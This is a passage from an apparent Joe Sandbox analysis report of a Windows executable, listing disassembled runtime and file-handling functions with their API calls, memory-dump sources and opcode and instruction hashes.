              • Opcode Fuzzy Hash: 18186207cab8e5f045d3017013133a024414c05c5d2eeb5385dde050bf218be7
              • Instruction Fuzzy Hash: 32016D21141618A6FB32BE758C45FA973C8EF06B41F0844D7F801D6071DBA69A41CBA7
              Function 00BAAFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
              Download Yara Rule
              APIs
              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00BAB019
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: Info
              • String ID:
              • API String ID: 1807457897-3916222277
              • Opcode ID: ac8bf0b26874ebc69ff04d6c11bb283fcd50657dc47ef22d7b6c1e784cbb18d6
              • Instruction ID: 041f3bb4b439682c1fe3fb75ba53c6155e7e41e6bcc554ef47e5127fc1cc10b4
              • Opcode Fuzzy Hash: ac8bf0b26874ebc69ff04d6c11bb283fcd50657dc47ef22d7b6c1e784cbb18d6
              • Instruction Fuzzy Hash: 3F41F67050838C9BDF218A648C95FF7BBE9DB46304F1404EDE5AA97143E335AA45DF60
              Function 00BAA72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 00BAA79D
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: String
              • String ID: LCMapStringEx
              • API String ID: 2568140703-3893581201
              • Opcode ID: 277a2474494f8bc189b8ba09f137b187bb66a4d5a235b0088cb1ccf0fa106e51
              • Instruction ID: 4627bc5c10f8c8d2d60c59666f201f5db2543f4754bcb7f9c9c77c59f89b82d0
              • Opcode Fuzzy Hash: 277a2474494f8bc189b8ba09f137b187bb66a4d5a235b0088cb1ccf0fa106e51
              • Instruction Fuzzy Hash: 3201D332544209BBCF069FA0DC06DEE7FB6EF49750F044194FE1526160CBB28971EBA1
              Function 00BAA6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
              Download Yara Rule
              APIs
              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00BA9D2F), ref: 00BAA715
              Strings
              • InitializeCriticalSectionEx, xrefs: 00BAA6E5
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: CountCriticalInitializeSectionSpin
              • String ID: InitializeCriticalSectionEx
              • API String ID: 2593887523-3084827643
              • Opcode ID: 1a1d3c364b90d976a1cc22e05e39255fdcda76526bd7b046883c2815888add57
              • Instruction ID: aa6c3de461a361a4a2b7dba3c33054c1f801182f823bff4fd198af0584dd1893
              • Opcode Fuzzy Hash: 1a1d3c364b90d976a1cc22e05e39255fdcda76526bd7b046883c2815888add57
              • Instruction Fuzzy Hash: 42F09A31649208BBCB11AF64CC05DAE7FE1EB49B20B0041A4FC192A260DFB19E11EBA1
              Function 00BAA56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: Alloc
              • String ID: FlsAlloc
              • API String ID: 2773662609-671089009
              • Opcode ID: 50677165a0491a964d25980526f7dabec70c47f92b19d363e094bc1946d094e3
              • Instruction ID: 752fa8365d232a6ca2f19323cb88bccbf3a6c1d6296218d05b462dd7034402e3
              • Opcode Fuzzy Hash: 50677165a0491a964d25980526f7dabec70c47f92b19d363e094bc1946d094e3
              • Instruction Fuzzy Hash: 4BE0EC70B892186B86146B549C059FDBBD4DB66B10B4101D5FC0567250DFF08E01D6EA
              Function 00BA329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
              Download Yara Rule
              APIs
              • try_get_function.LIBVCRUNTIME ref: 00BA32AF
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: try_get_function
              • String ID: FlsAlloc
              • API String ID: 2742660187-671089009
              • Opcode ID: 75c212689273e4fa2bb8a435d24bda4654c01d6b445d4e46a74ad789a242978f
              • Instruction ID: 0f37889bc80de65326a5f1bae6e5f9e1905c043b48748e6f54cbb22d767aad78
              • Opcode Fuzzy Hash: 75c212689273e4fa2bb8a435d24bda4654c01d6b445d4e46a74ad789a242978f
              • Instruction Fuzzy Hash: AED05B217857346B952032D56C03BFE7FC4C702FB5F4505E3FF096A192A5E1855045D6
              Function 00BAB350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00BAAF1B: GetOEMCP.KERNEL32(00000000,?,?,00BAB1A5,?), ref: 00BAAF46
              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00BAB1EA,?,00000000), ref: 00BAB3C4
              • GetCPInfo.KERNEL32(00000000,00BAB1EA,?,?,?,00BAB1EA,?,00000000), ref: 00BAB3D7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: CodeInfoPageValid
              • String ID:
              • API String ID: 546120528-0
              • Opcode ID: d9475beeab1df8f8ef97b736d34c8bec91c2f1c8783b4976db2433f47d8c79e0
              • Instruction ID: 0526476e461746e001a11caec87251f6e60ef3a310a9481c8c42528e15803b48
              • Opcode Fuzzy Hash: d9475beeab1df8f8ef97b736d34c8bec91c2f1c8783b4976db2433f47d8c79e0
              • Instruction Fuzzy Hash: D1513670D082059FDB248F75C891ABABBE5EF5A310F1881EED0A687353DB39D941CB91
              Function 00B81385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
              Download Yara Rule
              APIs
              • __EH_prolog.LIBCMT ref: 00B81385
                • Part of subcall function 00B86057: __EH_prolog.LIBCMT ref: 00B8605C
                • Part of subcall function 00B8C827: __EH_prolog.LIBCMT ref: 00B8C82C
                • Part of subcall function 00B8C827: new.LIBCMT ref: 00B8C86F
                • Part of subcall function 00B8C827: new.LIBCMT ref: 00B8C893
              • new.LIBCMT ref: 00B813FE
                • Part of subcall function 00B8B07D: __EH_prolog.LIBCMT ref: 00B8B082
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: bac59382aee72e788ce378208416b0efb2192852bcddd92813ffa4f415359a0e
              • Instruction ID: 82f0707cfa64722dbdcdcc022c22c47f07f18afa33f474b9eeca5bc0ab729b0e
              • Opcode Fuzzy Hash: bac59382aee72e788ce378208416b0efb2192852bcddd92813ffa4f415359a0e
              • Instruction Fuzzy Hash: 104134B0805B40DEE724EF7984859E7FBE5FB18310F444AAED2EE83292DB326554CB15
              Function 00B81380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON
              Download Yara Rule
              APIs
              • __EH_prolog.LIBCMT ref: 00B81385
                • Part of subcall function 00B86057: __EH_prolog.LIBCMT ref: 00B8605C
                • Part of subcall function 00B8C827: __EH_prolog.LIBCMT ref: 00B8C82C
                • Part of subcall function 00B8C827: new.LIBCMT ref: 00B8C86F
                • Part of subcall function 00B8C827: new.LIBCMT ref: 00B8C893
              • new.LIBCMT ref: 00B813FE
                • Part of subcall function 00B8B07D: __EH_prolog.LIBCMT ref: 00B8B082
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: d05ef7156f230ac66b8f55a19304ac131a22431bf6eae789da3dec6fbc4d2474
              • Instruction ID: 9749db38401b1d05d0a60fd4bc1abf0c676db4e867371f376d096c80cc879605
              • Opcode Fuzzy Hash: d05ef7156f230ac66b8f55a19304ac131a22431bf6eae789da3dec6fbc4d2474
              • Instruction Fuzzy Hash: 294134B0805B409EE724DF7984859E7FBE5FF18310F544AAED1EE83282DB326554CB15
              Function 00BAB188 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00BA8FA5: GetLastError.KERNEL32(?,00BC0EE8,00BA3E14,00BC0EE8,?,?,00BA3713,00000050,?,00BC0EE8,00000200), ref: 00BA8FA9
                • Part of subcall function 00BA8FA5: _free.LIBCMT ref: 00BA8FDC
                • Part of subcall function 00BA8FA5: SetLastError.KERNEL32(00000000,?,00BC0EE8,00000200), ref: 00BA901D
                • Part of subcall function 00BA8FA5: _abort.LIBCMT ref: 00BA9023
                • Part of subcall function 00BAB2AE: _abort.LIBCMT ref: 00BAB2E0
                • Part of subcall function 00BAB2AE: _free.LIBCMT ref: 00BAB314
                • Part of subcall function 00BAAF1B: GetOEMCP.KERNEL32(00000000,?,?,00BAB1A5,?), ref: 00BAAF46
              • _free.LIBCMT ref: 00BAB200
              • _free.LIBCMT ref: 00BAB236
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: _free$ErrorLast_abort
              • String ID:
              • API String ID: 2991157371-0
              • Opcode ID: 2aba9b3211dda916f512ab620c97f452109163ddbaf2659ead77ae7cc535202b
              • Instruction ID: 138cfe02f3173fe5031702a638dca160886b5c79aa6460831a18eead7226e6ee
              • Opcode Fuzzy Hash: 2aba9b3211dda916f512ab620c97f452109163ddbaf2659ead77ae7cc535202b
              • Instruction Fuzzy Hash: BB31B631908204AFDB10EFA9D841FADBBF5EF46320F2541DAE5249B2A2DF729D41CB50
              Function 00B8971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
              Download Yara Rule
              APIs
              • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00B89EDC,?,?,00B87867), ref: 00B897A6
              • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00B89EDC,?,?,00B87867), ref: 00B897DB
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: d945ac2c79fa9a0ef1211d7705e58aca33adb746bd5d993d6c65cca679d85461
              • Instruction ID: afdba00cece1a679e6298bace9b91c991040b68745eec23fb6c061425e6f9983
              • Opcode Fuzzy Hash: d945ac2c79fa9a0ef1211d7705e58aca33adb746bd5d993d6c65cca679d85461
              • Instruction Fuzzy Hash: C821E4B5114748AFDB30AF24CC85BB7B7E8EB49764F044A6DF5E5821A1C374AC48CB61
              Function 00B89D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
              Download Yara Rule
              APIs
              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00B87547,?,?,?,?), ref: 00B89D7C
              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00B89E2C
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: File$BuffersFlushTime
              • String ID:
              • API String ID: 1392018926-0
              • Opcode ID: 14d90edc984439c2b645db8467f13dbcf775407f59205fca11dabe2a737fdc80
              • Instruction ID: 80215e0a3c84ce8c21f8f7b34a4d1982abfbe9e67674bcaec18e4f6c204b8b8a
              • Opcode Fuzzy Hash: 14d90edc984439c2b645db8467f13dbcf775407f59205fca11dabe2a737fdc80
              • Instruction Fuzzy Hash: 0521D631158246AFCB14EF24C491BBBBBE4EF95704F0849ACB8D187161D729DA0CDB61
              Function 00BAA458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetProcAddress.KERNEL32(00000000,00BB3958), ref: 00BAA4B8
              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00BAA4C5
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AddressProc__crt_fast_encode_pointer
              • String ID:
              • API String ID: 2279764990-0
              • Opcode ID: 1f032287f45eeec770e65925df18ee13433910016c586cc26a77137a53f60a81
              • Instruction ID: 19ec616ee0a8b5785322bee80a0c2992cac6b81cc23b964c68a7e4326531e7d1
              • Opcode Fuzzy Hash: 1f032287f45eeec770e65925df18ee13433910016c586cc26a77137a53f60a81
              • Instruction Fuzzy Hash: AB11E7336056209F9F229E28EC848AA73D5DB8A72071642A0FD15AB354DF70DC41C7E2
              Function 00B89B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
              Download Yara Rule
              APIs
              • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00B89B35,?,?,00000000,?,?,00B88D9C,?), ref: 00B89BC0
              • GetLastError.KERNEL32 ref: 00B89BCD
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ErrorFileLastPointer
              • String ID:
              • API String ID: 2976181284-0
              • Opcode ID: 896d10e66ca310470a141c7c6ce151bf1fbe6b11e93850b03b8b9742ff8b9b55
              • Instruction ID: c424fb90fe58160bb0b904aaef17b3ec19d80f28984c228725df7cac79251b44
              • Opcode Fuzzy Hash: 896d10e66ca310470a141c7c6ce151bf1fbe6b11e93850b03b8b9742ff8b9b55
              • Instruction Fuzzy Hash: 3D0126313052059F8F0CEF25AC9497EB3D9EFC0B21B18466DF812832A0CA70DC05DB20
              Function 00B89E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON
              Download Yara Rule
              APIs
              • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00B89E76
              • GetLastError.KERNEL32 ref: 00B89E82
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ErrorFileLastPointer
              • String ID:
              • API String ID: 2976181284-0
              • Opcode ID: 91b2c0323b2cb55b68bfd191eabfd9e25f8841a1b92549985877bb3ac1e9ae0e
              • Instruction ID: 38257ec24f5214fd3d36d09a2796e8509e7f59c643e4d1a0b0e895de3b0d74de
              • Opcode Fuzzy Hash: 91b2c0323b2cb55b68bfd191eabfd9e25f8841a1b92549985877bb3ac1e9ae0e
              • Instruction Fuzzy Hash: 31018C713042009BEB34AA29D884B7BBBD9DB8871AF18497EB146C36A0DA71E84CC710
              Function 00BA8606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • _free.LIBCMT ref: 00BA8627
                • Part of subcall function 00BA8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BAC13D,00000000,?,00BA67E2,?,00000008,?,00BA89AD,?,?,?), ref: 00BA854A
              • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00BC0F50,00B8CE57,?,?,?,?,?,?), ref: 00BA8663
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: Heap$AllocAllocate_free
              • String ID:
              • API String ID: 2447670028-0
              • Opcode ID: 5477bbdc452077834726762ee020a328f02955e6849d2575e5dc8dfa07ecb283
              • Instruction ID: 0017e0aeaf53f0a8df5d3e10b26ac431584eeda1aeab12f9e19217121b8dc5af
              • Opcode Fuzzy Hash: 5477bbdc452077834726762ee020a328f02955e6849d2575e5dc8dfa07ecb283
              • Instruction Fuzzy Hash: A4F0C23110D1156AEB212A29AC00B6F37D8DF93BA0F244196F8189B991DE30D80095A4
              Function 00B90908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
              Download Yara Rule
              APIs
              • GetCurrentProcess.KERNEL32(?,?), ref: 00B90915
              • GetProcessAffinityMask.KERNEL32(00000000), ref: 00B9091C
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: Process$AffinityCurrentMask
              • String ID:
              • API String ID: 1231390398-0
              • Opcode ID: 614ffa693a9af0e37222d630d4b8debcf0ec0fb81e9a20b7e438186fb5616572
              • Instruction ID: 733fd6d140c838a0a6d832b99cd7915025ee5d4390d505e906dbc3d196135fb6
              • Opcode Fuzzy Hash: 614ffa693a9af0e37222d630d4b8debcf0ec0fb81e9a20b7e438186fb5616572
              • Instruction Fuzzy Hash: F3E09232A2011AAF6F09EAAC9C04ABB73DDEF4421072041BAA806D3201F930DE0186A0
              Function 00B8A444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
              Download Yara Rule
              APIs
              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B8A27A,?,?,?,00B8A113,?,00000001,00000000,?,?), ref: 00B8A458
              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B8A27A,?,?,?,00B8A113,?,00000001,00000000,?,?), ref: 00B8A489
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
